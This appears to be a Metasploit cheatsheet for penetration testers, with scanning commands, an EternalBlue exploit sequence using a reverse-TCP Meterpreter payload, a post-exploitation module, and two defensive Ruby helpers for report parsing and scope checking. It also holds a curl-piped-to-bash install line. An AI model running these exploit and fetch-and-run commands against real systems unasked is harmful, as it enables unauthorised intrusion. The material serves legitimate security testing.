Metasploit Framework Cheatsheet for Penetration Testers

Daniel Osei — AI-Assisted Security Engineer

What is Metasploit Framework?

Metasploit Framework is an open-source penetration testing platform that enables security professionals to find and exploit vulnerabilities in systems. It provides a suite of tools for offensive security, including exploits, payloads, and post-exploitation modules.

Installation

To install Metasploit, use the method that matches your operating system:

  • For Kali Linux, it comes pre-installed. Update with sudo apt update && sudo apt upgrade.
  • For Ubuntu:
    curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/scripts/msfupdate | bash
    Piping a downloaded script straight into bash executes it unread; save it to a file first, inspect it, then run it.
  • For Windows, download the installer from the Metasploit website.

Basic Syntax

The basic syntax to launch the Metasploit console is:

msfconsole

Discovery

Perform network discovery to gather information about the target environment.

Network Scanning

use auxiliary/scanner/portscan/tcp
set RHOSTS [Target IP]
run

Scanning for Vulnerabilities

use auxiliary/scanner/smb/smb_version
set RHOSTS [Target IP]
run

Exploitation

Use exploits to gain access to the target system.

Exploit a Specific Vulnerability

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS [Target IP]
set LHOST [Your IP]
exploit

Payloads

Specify the payload you want to use with your exploit:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

Post-Exploitation

After a successful exploit returns a session, run post-exploitation modules against that session:

# Migrates the session into a process matching its privilege level; list other modules with search post/windows/manage
use post/windows/manage/priv_migrate
set SESSION [Session ID]
run

Reporting

Export your findings from the workspace database (the database must be connected; check with db_status):

db_export -f xml /path/to/report.xml
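Turning an XML export into a quick host-and-service summary for the report. This is an added Ruby example, not part of the cheatsheet or of Metasploit itself; the sample export is constructed here, and its element names (MetasploitV5, hosts/host, address, name, os-name, services/service with port, proto, state, name and info) are an assumption modelled on the db_export layout, so adjust the element paths if your file differs.

```ruby
require 'rexml/document'

# Constructed sample export (not real scan data). Element names are an assumption
# modelled on the MetasploitV5 layout written by `db_export -f xml`.
SAMPLE_EXPORT = <<~XML
  <?xml version="1.0"?>
  <MetasploitV5>
    <hosts>
      <host>
        <address>192.168.1.10</address>
        <name>fileserver</name>
        <os-name>Windows 2008 R2</os-name>
        <services>
          <service><port>445</port><proto>tcp</proto><state>open</state><name>smb</name><info>Windows 2008 R2 SP1</info></service>
          <service><port>3389</port><proto>tcp</proto><state>open</state><name>rdp</name><info/></service>
        </services>
      </host>
      <host>
        <address>192.168.1.20</address>
        <name>dev-box</name>
        <os-name>Linux</os-name>
        <services>
          <service><port>22</port><proto>tcp</proto><state>open</state><name>ssh</name><info>OpenSSH</info></service>
          <service><port>445</port><proto>tcp</proto><state>closed</state><name>smb</name><info/></service>
        </services>
      </host>
    </hosts>
  </MetasploitV5>
XML

# Parse the export into plain hashes: one per host, each carrying its services.
# Missing optional elements (name, os-name, info) become empty strings.
def parse_export(xml)
  doc = REXML::Document.new(xml)
  doc.root.elements.to_a('hosts/host').map do |h|
    {
      address: h.elements['address'].text,
      name: (h.elements['name']&.text).to_s,
      os: (h.elements['os-name']&.text).to_s,
      services: h.elements.to_a('services/service').map do |s|
        {
          port: s.elements['port'].text.to_i,
          proto: s.elements['proto'].text,
          state: s.elements['state'].text,
          name: s.elements['name'].text,
          info: (s.elements['info']&.text).to_s
        }
      end
    }
  end
end

# Addresses of hosts with the given port open; handy for patch tracking
# (e.g. every host still exposing 445/tcp after an SMB finding).
def hosts_with_open_port(hosts, port, proto = 'tcp')
  hosts.select do |h|
    h[:services].any? { |s| s[:port] == port && s[:proto] == proto && s[:state] == 'open' }
  end.map { |h| h[:address] }
end

# One line per host: address, hostname, OS and the list of open ports.
def summary_lines(hosts)
  hosts.map do |h|
    open_ports = h[:services].select { |s| s[:state] == 'open' }.map { |s| "#{s[:port]}/#{s[:proto]}" }
    "#{h[:address]} #{h[:name]} (#{h[:os]}): #{open_ports.join(' ')}"
  end
end

if __FILE__ == $PROGRAM_NAME
  # Usage: swap SAMPLE_EXPORT for File.read('/path/to/report.xml')
  puts summary_lines(parse_export(SAMPLE_EXPORT))
end
```

Closed services are kept in the parsed data but left out of the summary, so the same parse can feed both the executive table and a full service inventory.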

Quick Reference Table

Option   Description
RHOSTS   Target host(s): a single IP, a dash range, or a CIDR block such as 192.168.1.0/24
LHOST    Your local IP address, where a reverse payload connects back to
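How an RHOSTS specification expands into individual targets, plus a scope check before anything is run against them. This is an added Ruby example, not Metasploit's own Rex::Socket::RangeWalker code; expand_rhosts, out_of_scope and check_targets are names chosen here, and the scope list is constructed. It covers a subset of the forms RangeWalker accepts (single address, CIDR, dash range, space-separated list), IPv4 only.

```ruby
require 'ipaddr'

# Expand an RHOSTS-style specification into individual IPv4 addresses.
# Supported forms (a subset of what Metasploit accepts):
#   single address        192.168.1.10
#   CIDR block            192.168.1.0/24   (includes network and broadcast, as Metasploit does)
#   dash range            192.168.1.10-20  (last octet) or 192.168.1.10-192.168.1.20
#   space-separated list  "192.168.1.1 192.168.1.5"
def expand_rhosts(spec)
  spec.split.flat_map do |token|
    if token.include?('/')
      IPAddr.new(token).to_range.map(&:to_s)
    elsif token.include?('-')
      first, last = token.split('-', 2)
      # Short form "a.b.c.x-y": complete the upper bound from the lower one
      last = first.sub(/\d+\z/, last) unless last.include?('.')
      (IPAddr.new(first)..IPAddr.new(last)).map(&:to_s)
    else
      [IPAddr.new(token).to_s]
    end
  end.uniq
end

# Hosts that fall outside the authorised scope (a constructed list of CIDR blocks).
def out_of_scope(hosts, scope_cidrs)
  scope = scope_cidrs.map { |c| IPAddr.new(c) }
  hosts.reject { |h| scope.any? { |net| net.include?(IPAddr.new(h)) } }
end

# Expand the spec and refuse it outright if any target is outside scope,
# so a typo in RHOSTS is caught before a scanner module runs.
def check_targets(spec, scope_cidrs)
  hosts = expand_rhosts(spec)
  stray = out_of_scope(hosts, scope_cidrs)
  raise ArgumentError, "out of scope: #{stray.join(', ')}" unless stray.empty?
  hosts
end

if __FILE__ == $PROGRAM_NAME
  # Constructed engagement scope; replace with the scope from your rules of engagement
  scope = ['192.168.1.0/24']
  puts check_targets('192.168.1.0/30 192.168.1.40-42', scope).join(' ')
end
```

Run the check against the same RHOSTS string you intend to type into msfconsole; a /24 typed as /16 shows up here as a long list of stray addresses rather than as unexpected traffic on someone else's network.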

Pro Tips

  • Use search [keyword] to quickly find exploits and auxiliary modules.
  • Manage multiple sessions: sessions -l lists open sessions, and sessions -i [Session ID] interacts with a specific one.

Real-World Examples

Use these structured commands in your pen-testing engagements:

# TCP Port Scan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run

# SMB Version Detection
use auxiliary/scanner/smb/smb_version
set RHOSTS [Target IP]
run